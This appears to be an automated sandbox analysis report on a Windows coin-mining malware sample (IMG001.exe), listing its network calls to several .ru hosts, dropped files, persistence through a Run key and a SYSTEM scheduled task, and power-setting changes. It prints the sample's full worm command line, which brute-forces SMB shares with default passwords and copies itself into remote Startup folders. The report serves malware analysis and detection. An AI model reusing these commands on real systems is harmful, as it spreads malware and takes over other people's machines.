Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stat.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stat.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stat.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stat.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stat.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stat.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stat.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: stafftest.ru

Source: IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	String found in binary or memory: http://hrtests.ru/stat.html
Source: IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	String found in binary or memory: http://hrtests.ru/stat.htmlc
Source: IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	String found in binary or memory: http://hrtests.ru/test.html
Source: IMG001.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: IMG001.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: IMG001.exe, 00000006.00000002.513988664.0000000000B4A000.00000004.00000020.sdmp, IMG001.exe, 00000006.00000003.371689003.0000000000BA2000.00000004.00000001.sdmp	String found in binary or memory: http://profetest.ru/stat.html
Source: IMG001.exe, 00000006.00000002.513988664.0000000000B4A000.00000004.00000020.sdmp, IMG001.exe, 00000006.00000003.371689003.0000000000BA2000.00000004.00000001.sdmp	String found in binary or memory: http://profetest.ru/test.html
Source: IMG001.exe, 00000006.00000003.371689003.0000000000BA2000.00000004.00000001.sdmp	String found in binary or memory: http://profetest.ru/test.htmlO
Source: IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	String found in binary or memory: http://stafftest.ru/stat.html
Source: IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	String found in binary or memory: http://stafftest.ru/test.html
Source: IMG001.exe, 00000006.00000003.248700310.0000000000BAB000.00000004.00000001.sdmp	String found in binary or memory: http://stafftest.ru/test.htmlD
Source: IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	String found in binary or memory: http://stafftest.ru/test.htmlo
Source: IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	String found in binary or memory: http://stafftest.ru/text.html
Source: IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	String found in binary or memory: http://stafftest.ru/text.html0
Source: tftp.exe, tftp.exe, 00000005.00000002.219945929.00000000001D5000.00000004.00000040.sdmp, tftp.exe, 0000000A.00000002.253644349.000000000062D000.00000004.00000010.sdmp, IMG001.exe, 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp, tftp.exe.26.dr	String found in binary or memory: http://testswork.ru/info.zip

Source: IMG001.exe, 00000000.00000002.216916333.0000000000B7A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Detected VMProtect packer

Show sources

Source: NsCpuCNMiner64.exe.6.dr

Static PE information: .vmp0 and .vmp1 section names

Uses powercfg.exe to modify the power settings

Show sources

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /CHANGE -standby-timeout-ac 0

Source: C:\Users\user\Desktop\IMG001.exe	Code function: 0_2_004030DE EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,	0_2_004030DE
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Code function: 6_2_004030DE EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,	6_2_004030DE
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Code function: 26_2_004030DE EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,	26_2_004030DE

Source: C:\Windows\SysWOW64\schtasks.exe

File created: C:\Windows\Tasks\UAC.job

Jump to behavior

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

File deleted: C:\Windows\Temp\nshEEFF.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Code function: 6_2_73811657

6_2_73811657

Source: C:\Users\user\AppData\Local\Temp\tftp.exe

Code function: String function: 0040CD30 appears 61 times

Source: IMG001.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IMG001.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IMG001.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IMG001.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IMG001.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IMG001.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IMG001.exe.26.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IMG001.exe.26.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IMG001.exe.26.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: IMG001.exe, 00000000.00000002.217135098.0000000002820000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs IMG001.exe
Source: IMG001.exe, 00000000.00000002.217135098.0000000002820000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs IMG001.exe
Source: IMG001.exe, 00000000.00000002.217079762.00000000027C0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs IMG001.exe
Source: IMG001.exe, 00000006.00000002.516788965.00000000030C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs IMG001.exe
Source: IMG001.exe, 00000006.00000002.514290394.0000000002910000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs IMG001.exe
Source: IMG001.exe, 00000006.00000002.514290394.0000000002910000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs IMG001.exe
Source: IMG001.exe, 00000006.00000002.516987965.0000000003200000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs IMG001.exe
Source: IMG001.exe, 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameinetc.dllF vs IMG001.exe
Source: IMG001.exe, 00000006.00000002.514187241.00000000028B0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs IMG001.exe
Source: IMG001.exe, 00000006.00000002.515958402.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamempr.dll.muij% vs IMG001.exe
Source: IMG001.exe, 0000001A.00000002.273275792.0000000001870000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs IMG001.exe
Source: IMG001.exe, 0000001A.00000002.273275792.0000000001870000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs IMG001.exe
Source: IMG001.exe, 0000001A.00000002.273123176.0000000001770000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs IMG001.exe

Source: IMG001.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v '' /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' /t REG_SZ

Source: C:\Users\user\AppData\Roaming\NsMiner\pools.txt, type: DROPPED

Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address

Source: classification engine

Classification label: mal100.spre.spyw.evad.mine.winEXE@122/22@31/87

Source: C:\Users\user\Desktop\IMG001.exe

File created: C:\Users\user\AppData\Roaming\NsMiner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mtx_pthr_locked_shmem
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_shmem
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListMax_shmem
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-rwl_global_shmem
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_static_shmem
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_sch_shmem
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-sjlj_once
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4168:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_shmem
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idList_shmem
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-use_fc_key
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_cancelling_shmem
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_global_shmem
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1124:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListCnt_shmem
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6792:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_once_shmem
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-fc_key
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_obj_shmem
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_dest_shmem
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5424:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListNextId_shmem
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mxattr_recursive_shmem
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_max_shmem
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-pthr_last_shmem
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-cond_locked_shmem_rwlock
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_lock_shmem
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-pthr_root_shmem

Source: C:\Users\user\Desktop\IMG001.exe

File created: C:\Users\user\AppData\Local\Temp\nsn8A2B.tmp

Jump to behavior

Source: IMG001.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "tftp.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "tftp.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "tftp.exe")

Source: C:\Users\user\Desktop\IMG001.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\IMG001.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: IMG001.exe	Virustotal: Detection: 84%
Source: IMG001.exe	Metadefender: Detection: 54%
Source: IMG001.exe	ReversingLabs: Detection: 87%

Source: C:\Users\user\Desktop\IMG001.exe

File read: C:\Users\user\Desktop\IMG001.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\IMG001.exe 'C:\Users\user\Desktop\IMG001.exe'
Source: C:\Users\user\Desktop\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im tftp.exe
Source: C:\Users\user\Desktop\IMG001.exe	Process created: C:\Users\user\AppData\Local\Temp\tftp.exe 'C:\Users\user\AppData\Local\Temp\tftp.exe'
Source: C:\Users\user\Desktop\IMG001.exe	Process created: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im tftp.exe
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Users\user\AppData\Local\Temp\tftp.exe 'C:\Users\user\AppData\Local\Temp\tftp.exe'
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c reg add 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v '' /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' /t REG_SZ
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c schtasks /create /tn 'UAC' /SC ONLOGON /F /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c schtasks /create /tn 'UAC' /RU 'SYSTEM' /SC ONLOGON /F /V1 /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v '' /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' /t REG_SZ
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 'UAC' /SC ONLOGON /F /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 'UAC' /RU 'SYSTEM' /SC ONLOGON /F /V1 /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /CHANGE -standby-timeout-ac 0
Source: unknown	Process created: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /CHANGE -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /v:on /c @(for /f 'usebackq tokens=1' %i in (`@net view^\|find /i '\\' ^\|^\| @arp -a^\|find /i ' 1'`) do @set str_!random!=%i)& @for /f 'usebackq tokens=1* delims==' %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:- =!& set f=IMG001.exe& set n=1704& @if not '!s!'=='%COMPUTERNAME%' @echo connect to \\!s! & (for /f 'usebackq tokens=1' %j in (`net view \\!s!^\|find /i ' '`) do @echo f\|xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' '\\!s!\%j\!f!' 1>nul && @echo copy to '\\!s!\%j\!f!') & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin ) do @for %p in (0 1 123 %u !n! '') do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not '%p%u'=='01' net use %c '%p' /user:'%u') && @((echo [Section1] & echo p=%p %u)>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & @(for %d in ('%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\ \ \ \!f!' '%c\Documents and Settings\All Users\ \ \ \!f!' '%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!' '%c\Windows\All Users\Start menu\Programs\Startup\!f!' '%c\%u\!f!' ) do @echo f\|@xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' %d 1>nul && @echo copy to %d) & @echo nul>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @net view\|find /i '\\' \|\| @arp -a\|find /i ' 1'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im tftp.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net view
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /i '\\'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /i ' 1'
Source: C:\Users\user\Desktop\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe	Jump to behavior
Source: C:\Users\user\Desktop\IMG001.exe	Process created: C:\Users\user\AppData\Local\Temp\tftp.exe 'C:\Users\user\AppData\Local\Temp\tftp.exe'	Jump to behavior
Source: C:\Users\user\Desktop\IMG001.exe	Process created: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im tftp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Users\user\AppData\Local\Temp\tftp.exe 'C:\Users\user\AppData\Local\Temp\tftp.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c reg add 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v '' /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' /t REG_SZ	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c schtasks /create /tn 'UAC' /SC ONLOGON /F /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c schtasks /create /tn 'UAC' /RU 'SYSTEM' /SC ONLOGON /F /V1 /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000	Jump to behavior
